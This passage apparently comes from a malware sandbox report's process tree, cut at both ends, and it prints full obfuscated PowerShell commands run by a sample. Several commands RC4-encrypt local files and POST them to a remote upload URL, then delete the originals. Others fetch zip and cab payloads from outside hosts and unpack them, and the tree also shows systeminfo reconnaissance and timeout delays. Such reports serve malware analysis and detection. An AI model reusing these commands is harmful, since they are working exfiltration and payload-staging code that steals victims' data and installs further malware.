$qlEMUTGteAdA -lt $VFPFIVkdaVP.Length; $qlEMUTGteAdA++) {$pVTuUFZgJeTg = ($pVTuUFZgJeTg + 1) % 256;$cimcjZyRCUM = ($cimcjZyRCUM + $VkbCqfOxmF[$pVTuUFZgJeTg]) % 256;$UaOsUHJTbs = $VkbCqfOxmF[$pVTuUFZgJeTg];$VkbCqfOxmF[$pVTuUFZgJeTg] = $VkbCqfOxmF[$cimcjZyRCUM];$VkbCqfOxmF[$cimcjZyRCUM] = $UaOsUHJTbs;$urgWSnAkdSFe = ($VkbCqfOxmF[$pVTuUFZgJeTg] + $VkbCqfOxmF[$cimcjZyRCUM]) % 256;$QiBpTOnlBxk[$qlEMUTGteAdA] = $VFPFIVkdaVP[$qlEMUTGteAdA] -bxor $VkbCqfOxmF[$urgWSnAkdSFe];}$JfnNgtWXCM = [System.Convert]::ToBase64String($QiBpTOnlBxk);return $JfnNgtWXCM;};$VbDSqCkiXZQ = 'https://goosess.com/read/get.php?wc=iew&vf=lk0100';$KWnAhHWFxDer = 'C:\Users\Public\Documents\di3726.zip';Add-Type -AssemblyName 'System.Web';$GilCbwtVtsL=(Get-Date).Ticks.ToString();$JMWjVfWRzVri = $VbDSqCkiXZQ.Split('?')[1];$KNQDusHeEmF = OnavpMuwhH -UmdocLPwMM $JMWjVfWRzVri -mIiGBlcMoFh $GilCbwtVtsL;$VbDSqCkiXZQ=$VbDSqCkiXZQ.Split('?')[0]+'?'+$GilCbwtVtsL+'='+[System.Web.HttpUtility]::UrlEncode($KNQDusHeEmF);iwr -Uri $VbDSqCkiXZQ -OutFile $KWnAhHWFxDer;"
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:1728
- C:\Windows\system32\systeminfo.exe
  systeminfo
  2⤵
  - Gathers system information
  PID:2600
- C:\Windows\system32\timeout.exe
  timeout -t 5 /nobreak
  2⤵
  - Delays execution with timeout.exe
  PID:1292
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -command "function MvkKywHqAI{param ($wobJeEkhXb,$CgZjHZSlbVD);$UlcLAbMMhfQz = [System.Text.Encoding]::UTF8.GetBytes($wobJeEkhXb); $ekTtpYTYUmDj = [System.Text.Encoding]::UTF8.GetBytes($CgZjHZSlbVD);$XomJLXzkAus = New-Object byte[](256);$iEhbBnGQra = New-Object byte[](256);for ($LZzjMPVcHiLE = 0; $LZzjMPVcHiLE -lt 256; $LZzjMPVcHiLE++) {$XomJLXzkAus[$LZzjMPVcHiLE] = $LZzjMPVcHiLE;$iEhbBnGQra[$LZzjMPVcHiLE] = $ekTtpYTYUmDj[$LZzjMPVcHiLE % $ekTtpYTYUmDj.Length];}$ZmtmYTnRxPR = 0;for ($LZzjMPVcHiLE = 0; $LZzjMPVcHiLE -lt 256; $LZzjMPVcHiLE++) {$ZmtmYTnRxPR = ($ZmtmYTnRxPR + $XomJLXzkAus[$LZzjMPVcHiLE] + $iEhbBnGQra[$LZzjMPVcHiLE]) % 256;$PapcMuOrJKV = $XomJLXzkAus[$LZzjMPVcHiLE];$XomJLXzkAus[$LZzjMPVcHiLE] = $XomJLXzkAus[$ZmtmYTnRxPR];$XomJLXzkAus[$ZmtmYTnRxPR] = $PapcMuOrJKV;}$tKyHKAHbbYxi = New-Object byte[] $UlcLAbMMhfQz.Length;$LZzjMPVcHiLE = 0;$ZmtmYTnRxPR = 0;for ($JuZEgbNvAXZ = 0; $JuZEgbNvAXZ -lt $UlcLAbMMhfQz.Length; $JuZEgbNvAXZ++) {$LZzjMPVcHiLE = ($LZzjMPVcHiLE + 1) % 256;$ZmtmYTnRxPR = ($ZmtmYTnRxPR + $XomJLXzkAus[$LZzjMPVcHiLE]) % 256;$PapcMuOrJKV = $XomJLXzkAus[$LZzjMPVcHiLE];$XomJLXzkAus[$LZzjMPVcHiLE] = $XomJLXzkAus[$ZmtmYTnRxPR];$XomJLXzkAus[$ZmtmYTnRxPR] = $PapcMuOrJKV;$OvilBbzvxhck = ($XomJLXzkAus[$LZzjMPVcHiLE] + $XomJLXzkAus[$ZmtmYTnRxPR]) % 256;$tKyHKAHbbYxi[$JuZEgbNvAXZ] = $UlcLAbMMhfQz[$JuZEgbNvAXZ] -bxor $XomJLXzkAus[$OvilBbzvxhck];}$xkDPxKpMyJA = [System.Convert]::ToBase64String($tKyHKAHbbYxi);return $xkDPxKpMyJA;};$iwZqbJOOHngq=(Get-Date).Ticks.ToString();$eqzyqfKtshq='http://stuckss.com/upload.php';$MTwdyMhaTYjs='AYFLYVMK_down.txt';$GqrwXQwpGy='C:\Users\Public\Documents\d1.txt';$gMRDFmqKFBul=gc -Path $GqrwXQwpGy -Raw | Out-String;Add-Type -AssemblyName 'System.Web';$MTwdyMhaTYjs=MvkKywHqAI -wobJeEkhXb $MTwdyMhaTYjs -CgZjHZSlbVD $iwZqbJOOHngq;$gMRDFmqKFBul=MvkKywHqAI -wobJeEkhXb $gMRDFmqKFBul -CgZjHZSlbVD $iwZqbJOOHngq;$FJGDlzUBlDZ = [System.Web.HttpUtility]::ParseQueryString('');$FJGDlzUBlDZ['fn']=$MTwdyMhaTYjs;$FJGDlzUBlDZ['fd']=$gMRDFmqKFBul;$FJGDlzUBlDZ['r']=$iwZqbJOOHngq;$VjvsmgNTHY=$FJGDlzUBlDZ.ToString();$cGmHomhQRSLg=[System.Text.Encoding]::UTF8.GetBytes($VjvsmgNTHY);$vSWCboPNXzG=[System.Net.WebRequest]::Create($eqzyqfKtshq);$vSWCboPNXzG.Method='PO'+'ST';$vSWCboPNXzG.ContentType='ap'+'plic'+'ati'+'on/x'+'-ww'+'w-for'+'m-ur'+'len'+'co'+'ded';$vSWCboPNXzG.ContentLength=$cGmHomhQRSLg.Length;$fxVcHSwNgCub = $vSWCboPNXzG.GetRequestStream();$fxVcHSwNgCub.Write($cGmHomhQRSLg,0,$cGmHomhQRSLg.Length);$fxVcHSwNgCub.Close();$ZABcjbdftCBY=$vSWCboPNXzG.GetResponse();if($ZABcjbdftCBY.StatusCode -eq [System.Net.HttpStatusCode]::OK){Remove-Item -Path $GqrwXQwpGy;$TuJxMBAXFNQ='C:\Users\Public\Documents\up'+'ok.t'+'xt';New-Item -ItemType File -Path $TuJxMBAXFNQ;}"
  2⤵
  - Blocklisted process makes network request
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:1104
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -command "function MvkKywHqAI{param ($wobJeEkhXb,$CgZjHZSlbVD);$UlcLAbMMhfQz = [System.Text.Encoding]::UTF8.GetBytes($wobJeEkhXb); $ekTtpYTYUmDj = [System.Text.Encoding]::UTF8.GetBytes($CgZjHZSlbVD);$XomJLXzkAus = New-Object byte[](256);$iEhbBnGQra = New-Object byte[](256);for ($LZzjMPVcHiLE = 0; $LZzjMPVcHiLE -lt 256; $LZzjMPVcHiLE++) {$XomJLXzkAus[$LZzjMPVcHiLE] = $LZzjMPVcHiLE;$iEhbBnGQra[$LZzjMPVcHiLE] = $ekTtpYTYUmDj[$LZzjMPVcHiLE % $ekTtpYTYUmDj.Length];}$ZmtmYTnRxPR = 0;for ($LZzjMPVcHiLE = 0; $LZzjMPVcHiLE -lt 256; $LZzjMPVcHiLE++) {$ZmtmYTnRxPR = ($ZmtmYTnRxPR + $XomJLXzkAus[$LZzjMPVcHiLE] + $iEhbBnGQra[$LZzjMPVcHiLE]) % 256;$PapcMuOrJKV = $XomJLXzkAus[$LZzjMPVcHiLE];$XomJLXzkAus[$LZzjMPVcHiLE] = $XomJLXzkAus[$ZmtmYTnRxPR];$XomJLXzkAus[$ZmtmYTnRxPR] = $PapcMuOrJKV;}$tKyHKAHbbYxi = New-Object byte[] $UlcLAbMMhfQz.Length;$LZzjMPVcHiLE = 0;$ZmtmYTnRxPR = 0;for ($JuZEgbNvAXZ = 0; $JuZEgbNvAXZ -lt $UlcLAbMMhfQz.Length; $JuZEgbNvAXZ++) {$LZzjMPVcHiLE = ($LZzjMPVcHiLE + 1) % 256;$ZmtmYTnRxPR = ($ZmtmYTnRxPR + $XomJLXzkAus[$LZzjMPVcHiLE]) % 256;$PapcMuOrJKV = $XomJLXzkAus[$LZzjMPVcHiLE];$XomJLXzkAus[$LZzjMPVcHiLE] = $XomJLXzkAus[$ZmtmYTnRxPR];$XomJLXzkAus[$ZmtmYTnRxPR] = $PapcMuOrJKV;$OvilBbzvxhck = ($XomJLXzkAus[$LZzjMPVcHiLE] + $XomJLXzkAus[$ZmtmYTnRxPR]) % 256;$tKyHKAHbbYxi[$JuZEgbNvAXZ] = $UlcLAbMMhfQz[$JuZEgbNvAXZ] -bxor $XomJLXzkAus[$OvilBbzvxhck];}$xkDPxKpMyJA = [System.Convert]::ToBase64String($tKyHKAHbbYxi);return $xkDPxKpMyJA;};$iwZqbJOOHngq=(Get-Date).Ticks.ToString();$eqzyqfKtshq='http://stuckss.com/upload.php';$MTwdyMhaTYjs='AYFLYVMK_docu.txt';$GqrwXQwpGy='C:\Users\Public\Documents\d2.txt';$gMRDFmqKFBul=gc -Path $GqrwXQwpGy -Raw | Out-String;Add-Type -AssemblyName 'System.Web';$MTwdyMhaTYjs=MvkKywHqAI -wobJeEkhXb $MTwdyMhaTYjs -CgZjHZSlbVD $iwZqbJOOHngq;$gMRDFmqKFBul=MvkKywHqAI -wobJeEkhXb $gMRDFmqKFBul -CgZjHZSlbVD $iwZqbJOOHngq;$FJGDlzUBlDZ = [System.Web.HttpUtility]::ParseQueryString('');$FJGDlzUBlDZ['fn']=$MTwdyMhaTYjs;$FJGDlzUBlDZ['fd']=$gMRDFmqKFBul;$FJGDlzUBlDZ['r']=$iwZqbJOOHngq;$VjvsmgNTHY=$FJGDlzUBlDZ.ToString();$cGmHomhQRSLg=[System.Text.Encoding]::UTF8.GetBytes($VjvsmgNTHY);$vSWCboPNXzG=[System.Net.WebRequest]::Create($eqzyqfKtshq);$vSWCboPNXzG.Method='PO'+'ST';$vSWCboPNXzG.ContentType='ap'+'plic'+'ati'+'on/x'+'-ww'+'w-for'+'m-ur'+'len'+'co'+'ded';$vSWCboPNXzG.ContentLength=$cGmHomhQRSLg.Length;$fxVcHSwNgCub = $vSWCboPNXzG.GetRequestStream();$fxVcHSwNgCub.Write($cGmHomhQRSLg,0,$cGmHomhQRSLg.Length);$fxVcHSwNgCub.Close();$ZABcjbdftCBY=$vSWCboPNXzG.GetResponse();if($ZABcjbdftCBY.StatusCode -eq [System.Net.HttpStatusCode]::OK){Remove-Item -Path $GqrwXQwpGy;$TuJxMBAXFNQ='C:\Users\Public\Documents\up'+'ok.t'+'xt';New-Item -ItemType File -Path $TuJxMBAXFNQ;}"
  2⤵
  - Blocklisted process makes network request
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:3036
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -command "function MvkKywHqAI{param ($wobJeEkhXb,$CgZjHZSlbVD);$UlcLAbMMhfQz = [System.Text.Encoding]::UTF8.GetBytes($wobJeEkhXb); $ekTtpYTYUmDj = [System.Text.Encoding]::UTF8.GetBytes($CgZjHZSlbVD);$XomJLXzkAus = New-Object byte[](256);$iEhbBnGQra = New-Object byte[](256);for ($LZzjMPVcHiLE = 0; $LZzjMPVcHiLE -lt 256; $LZzjMPVcHiLE++) {$XomJLXzkAus[$LZzjMPVcHiLE] = $LZzjMPVcHiLE;$iEhbBnGQra[$LZzjMPVcHiLE] = $ekTtpYTYUmDj[$LZzjMPVcHiLE % $ekTtpYTYUmDj.Length];}$ZmtmYTnRxPR = 0;for ($LZzjMPVcHiLE = 0; $LZzjMPVcHiLE -lt 256; $LZzjMPVcHiLE++) {$ZmtmYTnRxPR = ($ZmtmYTnRxPR + $XomJLXzkAus[$LZzjMPVcHiLE] + $iEhbBnGQra[$LZzjMPVcHiLE]) % 256;$PapcMuOrJKV = $XomJLXzkAus[$LZzjMPVcHiLE];$XomJLXzkAus[$LZzjMPVcHiLE] = $XomJLXzkAus[$ZmtmYTnRxPR];$XomJLXzkAus[$ZmtmYTnRxPR] = $PapcMuOrJKV;}$tKyHKAHbbYxi = New-Object byte[] $UlcLAbMMhfQz.Length;$LZzjMPVcHiLE = 0;$ZmtmYTnRxPR = 0;for ($JuZEgbNvAXZ = 0; $JuZEgbNvAXZ -lt $UlcLAbMMhfQz.Length; $JuZEgbNvAXZ++) {$LZzjMPVcHiLE = ($LZzjMPVcHiLE + 1) % 256;$ZmtmYTnRxPR = ($ZmtmYTnRxPR + $XomJLXzkAus[$LZzjMPVcHiLE]) % 256;$PapcMuOrJKV = $XomJLXzkAus[$LZzjMPVcHiLE];$XomJLXzkAus[$LZzjMPVcHiLE] = $XomJLXzkAus[$ZmtmYTnRxPR];$XomJLXzkAus[$ZmtmYTnRxPR] = $PapcMuOrJKV;$OvilBbzvxhck = ($XomJLXzkAus[$LZzjMPVcHiLE] + $XomJLXzkAus[$ZmtmYTnRxPR]) % 256;$tKyHKAHbbYxi[$JuZEgbNvAXZ] = $UlcLAbMMhfQz[$JuZEgbNvAXZ] -bxor $XomJLXzkAus[$OvilBbzvxhck];}$xkDPxKpMyJA = [System.Convert]::ToBase64String($tKyHKAHbbYxi);return $xkDPxKpMyJA;};$iwZqbJOOHngq=(Get-Date).Ticks.ToString();$eqzyqfKtshq='http://stuckss.com/upload.php';$MTwdyMhaTYjs='AYFLYVMK_desk.txt';$GqrwXQwpGy='C:\Users\Public\Documents\d3.txt';$gMRDFmqKFBul=gc -Path $GqrwXQwpGy -Raw | Out-String;Add-Type -AssemblyName 'System.Web';$MTwdyMhaTYjs=MvkKywHqAI -wobJeEkhXb $MTwdyMhaTYjs -CgZjHZSlbVD $iwZqbJOOHngq;$gMRDFmqKFBul=MvkKywHqAI -wobJeEkhXb $gMRDFmqKFBul -CgZjHZSlbVD $iwZqbJOOHngq;$FJGDlzUBlDZ = [System.Web.HttpUtility]::ParseQueryString('');$FJGDlzUBlDZ['fn']=$MTwdyMhaTYjs;$FJGDlzUBlDZ['fd']=$gMRDFmqKFBul;$FJGDlzUBlDZ['r']=$iwZqbJOOHngq;$VjvsmgNTHY=$FJGDlzUBlDZ.ToString();$cGmHomhQRSLg=[System.Text.Encoding]::UTF8.GetBytes($VjvsmgNTHY);$vSWCboPNXzG=[System.Net.WebRequest]::Create($eqzyqfKtshq);$vSWCboPNXzG.Method='PO'+'ST';$vSWCboPNXzG.ContentType='ap'+'plic'+'ati'+'on/x'+'-ww'+'w-for'+'m-ur'+'len'+'co'+'ded';$vSWCboPNXzG.ContentLength=$cGmHomhQRSLg.Length;$fxVcHSwNgCub = $vSWCboPNXzG.GetRequestStream();$fxVcHSwNgCub.Write($cGmHomhQRSLg,0,$cGmHomhQRSLg.Length);$fxVcHSwNgCub.Close();$ZABcjbdftCBY=$vSWCboPNXzG.GetResponse();if($ZABcjbdftCBY.StatusCode -eq [System.Net.HttpStatusCode]::OK){Remove-Item -Path $GqrwXQwpGy;$TuJxMBAXFNQ='C:\Users\Public\Documents\up'+'ok.t'+'xt';New-Item -ItemType File -Path $TuJxMBAXFNQ;}"
  2⤵
  - Blocklisted process makes network request
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2404
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -command "function MvkKywHqAI{param ($wobJeEkhXb,$CgZjHZSlbVD);$UlcLAbMMhfQz = [System.Text.Encoding]::UTF8.GetBytes($wobJeEkhXb); $ekTtpYTYUmDj = [System.Text.Encoding]::UTF8.GetBytes($CgZjHZSlbVD);$XomJLXzkAus = New-Object byte[](256);$iEhbBnGQra = New-Object byte[](256);for ($LZzjMPVcHiLE = 0; $LZzjMPVcHiLE -lt 256; $LZzjMPVcHiLE++) {$XomJLXzkAus[$LZzjMPVcHiLE] = $LZzjMPVcHiLE;$iEhbBnGQra[$LZzjMPVcHiLE] = $ekTtpYTYUmDj[$LZzjMPVcHiLE % $ekTtpYTYUmDj.Length];}$ZmtmYTnRxPR = 0;for ($LZzjMPVcHiLE = 0; $LZzjMPVcHiLE -lt 256; $LZzjMPVcHiLE++) {$ZmtmYTnRxPR = ($ZmtmYTnRxPR + $XomJLXzkAus[$LZzjMPVcHiLE] + $iEhbBnGQra[$LZzjMPVcHiLE]) % 256;$PapcMuOrJKV = $XomJLXzkAus[$LZzjMPVcHiLE];$XomJLXzkAus[$LZzjMPVcHiLE] = $XomJLXzkAus[$ZmtmYTnRxPR];$XomJLXzkAus[$ZmtmYTnRxPR] = $PapcMuOrJKV;}$tKyHKAHbbYxi = New-Object byte[] $UlcLAbMMhfQz.Length;$LZzjMPVcHiLE = 0;$ZmtmYTnRxPR = 0;for ($JuZEgbNvAXZ = 0; $JuZEgbNvAXZ -lt $UlcLAbMMhfQz.Length; $JuZEgbNvAXZ++) {$LZzjMPVcHiLE = ($LZzjMPVcHiLE + 1) % 256;$ZmtmYTnRxPR = ($ZmtmYTnRxPR + $XomJLXzkAus[$LZzjMPVcHiLE]) % 256;$PapcMuOrJKV = $XomJLXzkAus[$LZzjMPVcHiLE];$XomJLXzkAus[$LZzjMPVcHiLE] = $XomJLXzkAus[$ZmtmYTnRxPR];$XomJLXzkAus[$ZmtmYTnRxPR] = $PapcMuOrJKV;$OvilBbzvxhck = ($XomJLXzkAus[$LZzjMPVcHiLE] + $XomJLXzkAus[$ZmtmYTnRxPR]) % 256;$tKyHKAHbbYxi[$JuZEgbNvAXZ] = $UlcLAbMMhfQz[$JuZEgbNvAXZ] -bxor $XomJLXzkAus[$OvilBbzvxhck];}$xkDPxKpMyJA = [System.Convert]::ToBase64String($tKyHKAHbbYxi);return $xkDPxKpMyJA;};$iwZqbJOOHngq=(Get-Date).Ticks.ToString();$eqzyqfKtshq='http://stuckss.com/upload.php';$MTwdyMhaTYjs='AYFLYVMK_sys.txt';$GqrwXQwpGy='C:\Users\Public\Documents\d4.txt';$gMRDFmqKFBul=gc -Path $GqrwXQwpGy -Raw | Out-String;Add-Type -AssemblyName 'System.Web';$MTwdyMhaTYjs=MvkKywHqAI -wobJeEkhXb $MTwdyMhaTYjs -CgZjHZSlbVD $iwZqbJOOHngq;$gMRDFmqKFBul=MvkKywHqAI -wobJeEkhXb $gMRDFmqKFBul -CgZjHZSlbVD $iwZqbJOOHngq;$FJGDlzUBlDZ = [System.Web.HttpUtility]::ParseQueryString('');$FJGDlzUBlDZ['fn']=$MTwdyMhaTYjs;$FJGDlzUBlDZ['fd']=$gMRDFmqKFBul;$FJGDlzUBlDZ['r']=$iwZqbJOOHngq;$VjvsmgNTHY=$FJGDlzUBlDZ.ToString();$cGmHomhQRSLg=[System.Text.Encoding]::UTF8.GetBytes($VjvsmgNTHY);$vSWCboPNXzG=[System.Net.WebRequest]::Create($eqzyqfKtshq);$vSWCboPNXzG.Method='PO'+'ST';$vSWCboPNXzG.ContentType='ap'+'plic'+'ati'+'on/x'+'-ww'+'w-for'+'m-ur'+'len'+'co'+'ded';$vSWCboPNXzG.ContentLength=$cGmHomhQRSLg.Length;$fxVcHSwNgCub = $vSWCboPNXzG.GetRequestStream();$fxVcHSwNgCub.Write($cGmHomhQRSLg,0,$cGmHomhQRSLg.Length);$fxVcHSwNgCub.Close();$ZABcjbdftCBY=$vSWCboPNXzG.GetResponse();if($ZABcjbdftCBY.StatusCode -eq [System.Net.HttpStatusCode]::OK){Remove-Item -Path $GqrwXQwpGy;$TuJxMBAXFNQ='C:\Users\Public\Documents\up'+'ok.t'+'xt';New-Item -ItemType File -Path $TuJxMBAXFNQ;}"
  2⤵
  - Blocklisted process makes network request
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:1576
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -command "function OnavpMuwhH{param ($UmdocLPwMM,$mIiGBlcMoFh);$VFPFIVkdaVP = [System.Text.Encoding]::UTF8.GetBytes($UmdocLPwMM); $vBZPSaMPhEL = [System.Text.Encoding]::UTF8.GetBytes($mIiGBlcMoFh);$VkbCqfOxmF = New-Object byte[](256);$pquiAKHwBut = New-Object byte[](256);for ($pVTuUFZgJeTg = 0; $pVTuUFZgJeTg -lt 256; $pVTuUFZgJeTg++) {$VkbCqfOxmF[$pVTuUFZgJeTg] = $pVTuUFZgJeTg;$pquiAKHwBut[$pVTuUFZgJeTg] = $vBZPSaMPhEL[$pVTuUFZgJeTg % $vBZPSaMPhEL.Length];}$cimcjZyRCUM = 0;for ($pVTuUFZgJeTg = 0; $pVTuUFZgJeTg -lt 256; $pVTuUFZgJeTg++) {$cimcjZyRCUM = ($cimcjZyRCUM + $VkbCqfOxmF[$pVTuUFZgJeTg] + $pquiAKHwBut[$pVTuUFZgJeTg]) % 256;$UaOsUHJTbs = $VkbCqfOxmF[$pVTuUFZgJeTg];$VkbCqfOxmF[$pVTuUFZgJeTg] = $VkbCqfOxmF[$cimcjZyRCUM];$VkbCqfOxmF[$cimcjZyRCUM] = $UaOsUHJTbs;}$QiBpTOnlBxk = New-Object byte[] $VFPFIVkdaVP.Length;$pVTuUFZgJeTg = 0;$cimcjZyRCUM = 0;for ($qlEMUTGteAdA = 0; $qlEMUTGteAdA -lt $VFPFIVkdaVP.Length; $qlEMUTGteAdA++) {$pVTuUFZgJeTg = ($pVTuUFZgJeTg + 1) % 256;$cimcjZyRCUM = ($cimcjZyRCUM + $VkbCqfOxmF[$pVTuUFZgJeTg]) % 256;$UaOsUHJTbs = $VkbCqfOxmF[$pVTuUFZgJeTg];$VkbCqfOxmF[$pVTuUFZgJeTg] = $VkbCqfOxmF[$cimcjZyRCUM];$VkbCqfOxmF[$cimcjZyRCUM] = $UaOsUHJTbs;$urgWSnAkdSFe = ($VkbCqfOxmF[$pVTuUFZgJeTg] + $VkbCqfOxmF[$cimcjZyRCUM]) % 256;$QiBpTOnlBxk[$qlEMUTGteAdA] = $VFPFIVkdaVP[$qlEMUTGteAdA] -bxor $VkbCqfOxmF[$urgWSnAkdSFe];}$JfnNgtWXCM = [System.Convert]::ToBase64String($QiBpTOnlBxk);return $JfnNgtWXCM;};$VbDSqCkiXZQ = 'http://stuckss.com/list.php?f=AYFLYVMK.txt';$KWnAhHWFxDer = 'C:\Users\Public\Documents\rBTob.cab';Add-Type -AssemblyName 'System.Web';$GilCbwtVtsL=(Get-Date).Ticks.ToString();$JMWjVfWRzVri = $VbDSqCkiXZQ.Split('?')[1];$KNQDusHeEmF = OnavpMuwhH -UmdocLPwMM $JMWjVfWRzVri -mIiGBlcMoFh $GilCbwtVtsL;$VbDSqCkiXZQ=$VbDSqCkiXZQ.Split('?')[0]+'?'+$GilCbwtVtsL+'='+[System.Web.HttpUtility]::UrlEncode($KNQDusHeEmF);iwr -Uri $VbDSqCkiXZQ -OutFile $KWnAhHWFxDer;"
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:1288
- C:\Windows\system32\expand.exe
  expand rBTob.cab -F:* C:\Users\Public\Documents\
  2⤵
  PID:2268
- C:\Windows\system32\timeout.exe
  timeout -t 57 /nobreak
  2⤵
  - Delays execution with timeout.exe
  PID:2484
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -command "function OnavpMuwhH{param ($UmdocLPwMM,$mIiGBlcMoFh);$VFPFIVkdaVP = [System.Text.Encoding]::UTF8.GetBytes($UmdocLPwMM); $vBZPSaMPhEL = [System.Text.Encoding]::UTF8.GetBytes($mIiGBlcMoFh);$VkbCqfOxmF = New-Object byte[](256);$pquiAKHwBut = New-Object byte[](256);for ($pVTuUFZgJeTg = 0; $pVTuUFZgJeTg -lt 256; $pVTuUFZgJeTg++) {$VkbCqfOxmF[$pVTuUFZgJeTg] = $pVTuUFZgJeTg;$pquiAKHwBut[$pVTuUFZgJeTg] = $vBZPSaMPhEL[$pVTuUFZgJeTg % $vBZPSaMPhEL.Length];}$cimcjZyRCUM = 0;for ($pVTuUFZgJeTg = 0; $pVTuUFZgJeTg -lt 256; $pVTuUFZgJeTg++) {$cimcjZyRCUM = ($cimcjZyRCUM + $VkbCqfOxmF[$pVTuUFZgJeTg] + $pquiAKHwBut[$pVTuUFZgJeTg]) % 256;$UaOsUHJTbs = $VkbCqfOxmF[$pVTuUFZgJeTg];$VkbCqfOxmF[$pVTuUFZgJeTg] = $VkbCqfOxmF[$cimcjZyRCUM];$VkbCqfOxmF[$cimcjZyRCUM] = $UaOsUHJTbs;}$QiBpTOnlBxk = New-Object byte[] $VFPFIVkdaVP.Length;$pVTuUFZgJeTg = 0;$cimcjZyRCUM = 0;for ($qlEMUTGteAdA = 0; $qlEMUTGteAdA -lt $VFPFIVkdaVP.Length; $qlEMUTGteAdA++) {$pVTuUFZgJeTg = ($pVTuUFZgJeTg + 1) % 256;$cimcjZyRCUM = ($cimcjZyRCUM + $VkbCqfOxmF[$pVTuUFZgJeTg]) % 256;$UaOsUHJTbs = $VkbCqfOxmF[$pVTuUFZgJeTg];$VkbCqfOxmF[$pVTuUFZgJeTg] = $VkbCqfOxmF[$cimcjZyRCUM];$VkbCqfOxmF[$cimcjZyRCUM] = $UaOsUHJTbs;$urgWSnAkdSFe = ($VkbCqfOxmF[$pVTuUFZgJeTg] + $VkbCqfOxmF[$cimcjZyRCUM]) % 256;$QiBpTOnlBxk[$qlEMUTGteAdA] = $VFPFIVkdaVP[$qlEMUTGteAdA] -bxor $VkbCqfOxmF[$urgWSnAkdSFe];}$JfnNgtWXCM = [System.Convert]::ToBase64String($QiBpTOnlBxk);return $JfnNgtWXCM;};$VbDSqCkiXZQ = 'http://stuckss.com/list.php?f=AYFLYVMK.txt';$KWnAhHWFxDer = 'C:\Users\Public\Documents\rBTob.cab';Add-Type -AssemblyName 'System.Web';$GilCbwtVtsL=(Get-Date).Ticks.ToString();$JMWjVfWRzVri = $VbDSqCkiXZQ.Split('?')[1];$KNQDusHeEmF = OnavpMuwhH -UmdocLPwMM $JMWjVfWRzVri -mIiGBlcMoFh $GilCbwtVtsL;$VbDSqCkiXZQ=$VbDSqCkiXZQ.Split('?')[0]+'?'+$GilCbwtVtsL+'='+[System.Web.HttpUtility]::UrlEncode($KNQDusHeEmF);iwr -Uri $VbDSqCkiXZQ -OutFile $KWnAhHWFxDer;"
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:1108
- C:\Windows\system32\expand.exe
  expand rBTob.cab -F:* C:\Users\Public\Documents\
  2⤵
  PID:1152
- C:\Windows\system32\timeout.exe
  timeout -t 57 /nobreak
  2⤵
  - Delays execution with timeout.exe
  PID:1760
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -command "function OnavpMuwhH{param ($UmdocLPwMM,$mIiGBlcMoFh);$VFPFIVkdaVP = [System.Text.Encoding]::UTF8.GetBytes($UmdocLPwMM); $vBZPSaMPhEL = [System.Text.Encoding]::UTF8.GetBytes($mIiGBlcMoFh);$VkbCqfOxmF = New-Object byte[](256);$pquiAKHwBut = New-Object byte[](256);for ($pVTuUFZgJeTg = 0; $pVTuUFZgJeTg -lt 256; $pVTuUFZgJeTg++) {$VkbCqfOxmF[$pVTuUFZgJeTg] = $pVTuUFZgJeTg;$pquiAKHwBut[$pVTuUFZgJeTg] = $vBZPSaMPhEL[$pVTuUFZgJeTg % $vBZPSaMPhEL.Length];}$cimcjZyRCUM = 0;for ($pVTuUFZgJeTg = 0; $pVTuUFZgJeTg -lt 256; $pVTuUFZgJeTg++) {$cimcjZyRCUM = ($cimcjZyRCUM + $VkbCqfOxmF[$pVTuUFZgJeTg] + $pquiAKHwBut[$pVTuUFZgJeTg]) % 256;$UaOsUHJTbs = $VkbCqfOxmF[$pVTuUFZgJeTg];$VkbCqfOxmF[$pVTuUFZgJeTg] = $VkbCqfOxmF[$cimcjZyRCUM];$VkbCqfOxmF[$cimcjZyRCUM] = $UaOsUHJTbs;}$QiBpTOnlBxk = New-Object byte[] $VFPFIVkdaVP.Length;$pVTuUFZgJeTg = 0;$cimcjZyRCUM = 0;for ($qlEMUTGteAdA = 0; $qlEMUTGteAdA -lt $VFPFIVkdaVP.Length; $qlEMUTGteAdA++) {$pVTuUFZgJeTg = ($pVTuUFZgJeTg + 1) % 256;$cimcjZyRCUM = ($cimcjZyRCUM + $VkbCqfOxmF[$pVTuUFZgJeTg]) % 256;$UaOsUHJTbs = $VkbCqfOxmF[$pVTuUFZgJeTg];$VkbCqfOxmF[$pVTuUFZgJeTg] = $VkbCqfOxmF[$cimcjZyRCUM];$VkbCqfOxmF[$cimcjZyRCUM] = $UaOsUHJTbs;$urgWSnAkdSFe = ($VkbCqfOxmF[$pVTuUFZgJeTg] + $VkbCqfOxmF[$cimcjZyRCUM]) % 256;$QiBpTOnlBxk[$qlEMUTGteAdA] = $VFPFIVkdaVP[$qlEMUTGteAdA] -bxor $VkbCqfOxmF[$urgWSnAkdSFe];}$JfnNgtWXCM = [System.Convert]::ToBase64String($QiBpTOnlBxk);return $JfnNgtWXCM;};$VbDSqCkiXZQ = 'http://stuckss.com/list.php?f=AYFLYVMK.txt';$KWnAhHWFxDer = 'C:\Users\Public\Documents\rBTob.cab';Add-Type -AssemblyName 'System.Web';$GilCbwtVtsL=(Get-Date).Ticks.ToString();$JMWjVfWRzVri = $VbDSqCkiXZQ.Split('?')[1];$KNQDusHeEmF = OnavpMuwhH -UmdocLPwMM $JMWjVfWRzVri -mIiGBlcMoFh 